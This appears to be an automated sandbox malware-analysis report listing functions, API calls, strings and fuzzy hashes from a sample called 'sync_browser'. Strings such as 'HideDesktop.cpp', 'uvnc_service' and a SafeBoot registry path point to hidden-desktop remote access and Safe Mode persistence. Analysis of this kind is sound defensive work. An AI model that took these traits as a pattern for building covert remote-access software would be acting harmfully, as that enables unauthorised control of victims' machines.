                                                                    Function 00007FF6DC0C67E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SubVersionNumber
                                                                    • API String ID: 3677997916-1834015684
                                                                    • Opcode ID: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                    • Instruction ID: e81b4e5b4d460116bcdbc08c0a32b8a84b708f6366f0b143379a6e6e9650e35d
                                                                    • Opcode Fuzzy Hash: fb5cba2e797ba38d9a3dd7c8f4aa1b18ae4dee72e891ecdbfe1ae65bac5d5b43
                                                                    • Instruction Fuzzy Hash: 77219531A18B8681FB608B20E9447AE73B4FF94758F401136D64D876A8EF3DD06ACB04
                                                                    Function 00007FF6DC0CA600 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 36libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressCreateFreeInfoInitializeInstanceLoadParametersProcSystem
                                                                    • String ID: HideDesktop.cpp : Restorewallpaper %i$HideDesktop.cpp : Restorewallpaper %i %i$shell32.dll
                                                                    • API String ID: 3848869850-2975526927
                                                                    • Opcode ID: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction ID: 56a5bd556bc45d6673843d2cd72f00ee367442c3d3fe7cd47756756989687b5a
                                                                    • Opcode Fuzzy Hash: 86e18f80a34eacc762fd4aea0dba914ccb49a3b135e5f10d2f504f448b0c5f0f
                                                                    • Instruction Fuzzy Hash: 42112A70E2D55B82FA509B20EA14ABD2359AFA4304F504133C50DD26A1DF3DB62BC751
                                                                    Function 00007FF6DC0C6D60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Installed$System\WPA\MediaCenter
                                                                    • API String ID: 3677997916-3461404619
                                                                    • Opcode ID: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction ID: 6143a33501d79652a0959bf91e4176d3ecafebb3fc17852cab0f33546b6d5abc
                                                                    • Opcode Fuzzy Hash: 554435a057f14dda37f7a57cb3d76111e403ad3072006c26abcf41054863a4ac
                                                                    • Instruction Fuzzy Hash: 55018871A18B9582EB508F51F84475E7764FB84794F400133EA9E86B64DF3CD15ACF00
                                                                    Function 00007FF6DC0CD790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileWrite$SectionStringwsprintf
                                                                    • String ID: Permissions$isWritable
                                                                    • API String ID: 4007284473-46173998
                                                                    • Opcode ID: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                    • Instruction ID: a498cb41ed9d701224c6e3af13734631d7885e827fd9869843e4f088ee7cc99b
                                                                    • Opcode Fuzzy Hash: 7f12bc1f13081b37d87251f9c01b571011c2547fbcf2e5f3b1996aca624bc9e1
                                                                    • Instruction Fuzzy Hash: 2A017C75A08A5B92FA109B11FC515B93328FF89B58F801133D92DC6251EE3CE26BCB80
                                                                    Function 00007FF6DC0D3760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 23registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete_errno_invalid_parameter_noinfo_snprintf
                                                                    • String ID: Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$uvnc_service
                                                                    • API String ID: 1597899911-1199838351
                                                                    • Opcode ID: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                    • Instruction ID: 8a24333cc201b2fe0834cc747404691716e06d49bd41937c5cecef7f6e2192b2
                                                                    • Opcode Fuzzy Hash: 446da7c11d9b0ffc6a81d4342d0f74e20c69771809681aa75ea43c0afc302851
                                                                    • Instruction Fuzzy Hash: 37F03065A19A5A91EA109720FC553BE6368FB84318FC01237E65D827A8DE3CD12BCB84
                                                                    Function 00007FF6DC17929C Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _amsg_exit_errno_getptd_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1050512615-0
                                                                    • Opcode ID: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction ID: c1b04c750f4627697f3d1fbc5b10bb4d626bb86be7123dc7b3ddfe203f29c1ac
                                                                    • Opcode Fuzzy Hash: 59d3a9a0c59e1ee59521e481f79702260e81d2ffae729b60c0b2a618ea284cda
                                                                    • Instruction Fuzzy Hash: 9471F613E0C2EA64F7514A719C8097C2BAD6F02784F1C8633FE598669ACE2CD473EB51
                                                                    Function 00007FF6DC185D3C Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringTypefreemalloc
                                                                    • String ID:
                                                                    • API String ID: 307345228-0
                                                                    • Opcode ID: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction ID: fa0e941afe33c4183f952dbda18efaaa8567b9747ca2bd1222af94c861d6d4e7
                                                                    • Opcode Fuzzy Hash: 1b990316f8ee8c74eb84edbc338ace2982aad15001b0fddeae94aa45b172380f
                                                                    • Instruction Fuzzy Hash: 74416F72A18A5596FB119F259C005AD7299FF44BA8F584236EE2D877D4DF3CE4228310
                                                                    Function 00007FF6DC177A88 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177AB1
                                                                    • DecodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177AC1
                                                                      • Part of subcall function 00007FF6DC183480: _errno.LIBCMT ref: 00007FF6DC183489
                                                                      • Part of subcall function 00007FF6DC183480: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC183494
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B3F
                                                                      • Part of subcall function 00007FF6DC183370: realloc.LIBCMT ref: 00007FF6DC18339B
                                                                      • Part of subcall function 00007FF6DC183370: Sleep.KERNEL32(?,?,00000000,00007FF6DC177B2F,?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC1833B7
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B4F
                                                                    • EncodePointer.KERNEL32(?,?,00000000,00007FF6DC177B9D,?,?,?,?,00007FF6DC1779F3), ref: 00007FF6DC177B5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                                                    • String ID:
                                                                    • API String ID: 1909145217-0
                                                                    • Opcode ID: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction ID: 5b3642d2c9d5efc950773bb88dd22d03e9644c57a032859f5aa02d217b24300f
                                                                    • Opcode Fuzzy Hash: 17a63d5b591e686c9ca2fe18f5a8febc498bada363ee497b58ea7ee50b63046d
                                                                    • Instruction Fuzzy Hash: 0D219F20F0AA6AC2EA05DB51ED4416EA359BF48BC0F484837DA4DC7795EE7CE4A78740
                                                                    Function 00007FF6DC0EDAF0 Relevance: 7.6, APIs: 5, Instructions: 52COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3328731263-0
                                                                    • Opcode ID: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction ID: faad45e6cd7fd3893955d800b986643358c0d5dd9a5049a9291a6d9ec8986142
                                                                    • Opcode Fuzzy Hash: 9dd024a0743743ff4cf6db73d8cdcba100ffa6c5f44379b46dcf004888688eea
                                                                    • Instruction Fuzzy Hash: 75215121B09B85A6EA58DB20E9A02FD6368FF91750F444132C6AEC32A1DF7CE176C750
                                                                    Function 00007FF6DC18A62C Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                    • String ID:
                                                                    • API String ID: 1445889803-0
                                                                    • Opcode ID: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction ID: b5cb51b9f5656a54426410dc051274a095244e166d8545ba3bf2b9626854c3f5
                                                                    • Opcode Fuzzy Hash: 5fd10cac5a6f9bb249cac31feee61d70b85b460cd106259e4606b4f7c020a879
                                                                    • Instruction Fuzzy Hash: 8D01C821618B1982E7409F21FD4426D6364FF05B90F546532EE5E877A4CE3CD8B78700
                                                                    Function 00007FF6DC0D7A30 Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CriticalInitializeSection
                                                                    • String ID:
                                                                    • API String ID: 4164307405-0
                                                                    • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction ID: e25edb10d9d033ddcec8424b161890a03d56fe75829ce93eec0e872f2589d3af
                                                                    • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                    • Instruction Fuzzy Hash: 0101CE72504B45C2EB048F25E9841ACB3BCFBA8B98B140126CA9D877A8CF38C4A6C740
                                                                    Function 00007FF6DC17B6F0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno
                                                                    • String ID:
                                                                    • API String ID: 921712934-0
                                                                    • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                    • Instruction ID: 136da19ea3ff4c372ff1b8f23c60ee93e8349a8c62a09154bd0ea19d5615a09a
                                                                    • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                    • Instruction Fuzzy Hash: 45018162E1D66EC5EA056B54CC4137C2154AF95B62F515333E52D863D2CF6C6823A220
                                                                    Function 00007FF6DC0E3220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
